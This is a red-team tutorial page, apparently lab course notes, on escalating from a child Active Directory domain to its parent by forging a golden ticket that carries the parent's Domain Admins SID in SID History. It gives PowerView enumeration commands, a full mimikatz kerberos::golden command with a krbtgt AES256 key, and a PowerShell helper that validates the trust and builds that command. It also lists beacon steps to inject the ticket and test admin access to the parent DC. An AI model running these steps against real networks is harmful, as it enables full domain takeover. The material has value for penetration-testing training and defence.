Parent/Child

Enumerate the trusts of the current (child) domain, then pull the two values needed from the parent: the SID of its Domain Admins group (this becomes /sids below) and the name of a parent DC to test against.

beacon> powershell Get-DomainTrust

beacon> powershell Get-DomainGroup -Identity "Domain Admins" -Domain cyberbotic.io -Properties ObjectSid

beacon> powershell Get-DomainController -Domain cyberbotic.io | select Name

A parent/child trust inside a forest is two-way and transitive, and SID filtering is not enforced on it, so a TGT forged in the child whose PAC carries the parent's Domain Admins SID (RID 512) in its ExtraSids (the SID History field) is honoured by the parent. With Domain Admin rights in the child (i.e. the child's krbtgt key) you can therefore become Domain Admin in the parent; because the trust is two-way, the same trick works in the other direction.

mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /aes256:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /startoffset:-10 /endin:600 /renewmax:10080 /ticket:cyberbotic.kirbi

Where:

  • /user is the username to impersonate (any name will do, since the PAC is forged).

  • /domain is the current (child) domain.

  • /sid is the SID of the current (child) domain.

  • /sids is the SID of the group in the parent to add ourselves to; here it is the parent's Domain Admins (RID 512), injected via the SID History field of the PAC.

  • /aes256 is the AES256 key of the current domain's krbtgt account.

  • /startoffset sets the start time of the ticket to 10 mins before the current time (a negative offset, so the ticket is already valid).

  • /endin sets the lifetime of the ticket in minutes: 600 is 10 hours, matching the default TGT lifetime.

  • /renewmax sets how long (in minutes) the ticket can stay valid if renewed: 10080 is 7 days, again matching the domain default.

  • /ticket writes the ticket to a file instead of injecting it into the current session.
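The following PowerShell is an added example, not part of the original notes or of mimikatz. It checks that the trust is one on which SID History is honoured, derives the parent's RID-512 SID from the parent domain SID, refuses a /sids value that points back into the child, and assembles the kerberos::golden command with the page's own values. The SIDs, domain names and krbtgt key are the ones from the page; the trust object is a constructed sample shaped like PowerView's Get-DomainTrust output (PowerView prints the TrustAttributes flags by name; the raw bit values used here are the same ones from MS-ADTS).

```powershell
# Added example: sanity-check and build the SID-History golden-ticket command.
# TrustAttributes bit flags (MS-ADTS); PowerView decodes these to the same names.
$TrustAttr = @{
    NON_TRANSITIVE    = 0x1
    UPLEVEL_ONLY      = 0x2
    FILTER_SIDS       = 0x4    # "quarantined" trust: SID history is stripped
    FOREST_TRANSITIVE = 0x8
    CROSS_ORGANIZATION = 0x10
    WITHIN_FOREST     = 0x20   # parent/child and tree-root trusts in one forest
    TREAT_AS_EXTERNAL = 0x40
}

function Test-SidHistoryHonoured {
    param([int]$TrustAttributes)
    # Intra-forest trusts pass SID history through unless FILTER_SIDS was set explicitly.
    $withinForest = ($TrustAttributes -band $TrustAttr.WITHIN_FOREST) -ne 0
    $filtered     = ($TrustAttributes -band $TrustAttr.FILTER_SIDS)   -ne 0
    return ($withinForest -and -not $filtered)
}

function Get-DomainSidPrefix {
    param([string]$Sid)
    # Strip a trailing RID so "S-1-5-21-x-y-z" and "S-1-5-21-x-y-z-512" compare as one domain.
    if ($Sid -match '^(S-1-5-21-\d+-\d+-\d+)(-\d+)?$') { return $Matches[1] }
    throw "Not a domain SID: $Sid"
}

function New-GoldenTicketCommand {
    param(
        [string]$User, [string]$Domain, [string]$DomainSid, [string]$ParentDomainSid,
        [string]$KrbtgtAes256, [string]$OutFile,
        [int]$StartOffsetMin = -10, [int]$EndInMin = 600, [int]$RenewMaxMin = 10080,
        [int]$Rid = 512        # 512 = Domain Admins; 519 = Enterprise Admins (forest root only)
    )
    $extraSid = "$(Get-DomainSidPrefix $ParentDomainSid)-$Rid"
    if ((Get-DomainSidPrefix $DomainSid) -eq (Get-DomainSidPrefix $extraSid)) {
        throw "/sids $extraSid belongs to $Domain itself; no privilege crosses the trust"
    }
    if ($StartOffsetMin -gt 0) { throw "/startoffset must be <= 0 or the ticket is not yet valid" }
    if ($EndInMin -gt $RenewMaxMin) { throw "/endin cannot exceed /renewmax" }
    Write-Host ("Ticket valid {0}h, renewable {1}d, extra SID {2}" -f ($EndInMin / 60), ($RenewMaxMin / 1440), $extraSid)
    return "kerberos::golden /user:$User /domain:$Domain /sid:$DomainSid /sids:$extraSid " +
           "/aes256:$KrbtgtAes256 /startoffset:$StartOffsetMin /endin:$EndInMin " +
           "/renewmax:$RenewMaxMin /ticket:$OutFile"
}

# Constructed sample of what Get-DomainTrust returns for the child -> parent trust.
$trust = [pscustomobject]@{
    SourceName = 'dev.cyberbotic.io'; TargetName = 'cyberbotic.io'
    TrustDirection = 'Bidirectional'; TrustAttributes = 0x20   # WITHIN_FOREST
}
if (-not (Test-SidHistoryHonoured $trust.TrustAttributes)) {
    throw "SID filtering is enforced on $($trust.SourceName) -> $($trust.TargetName); /sids will be dropped"
}

New-GoldenTicketCommand -User Administrator -Domain dev.cyberbotic.io `
    -DomainSid 'S-1-5-21-3263068140-2042698922-2891547269' `
    -ParentDomainSid 'S-1-5-21-378720957-2217973887-3501892633' `
    -KrbtgtAes256 '390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa' `
    -OutFile cyberbotic.kirbi
```

The emitted line is exactly the mimikatz command on the page. The FILTER_SIDS check matters in practice: if a defender has set SID filtering (quarantine) on the trust, the KDC in the parent strips the ExtraSids and the ticket still works in the child but buys nothing upstream.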

Create a fresh logon session first so that injecting the forged ticket does not overwrite the TGT of the current session. The domain and password given to make_token are irrelevant (the logon is network-only and the credentials are never validated); the output still reports the current user because of that logon type.

beacon> make_token CYBER\Administrator FakePass
[+] Impersonated DEV\bfarmer

beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\cyberbotic.kirbi

Verify against the parent DC found above: listing C$ on it only succeeds if the parent accepted the injected Domain Admins SID.

beacon> ls \\dc-1\c$

Drop the token when done, returning to the original session and its unmodified TGT.

beacon> rev2self
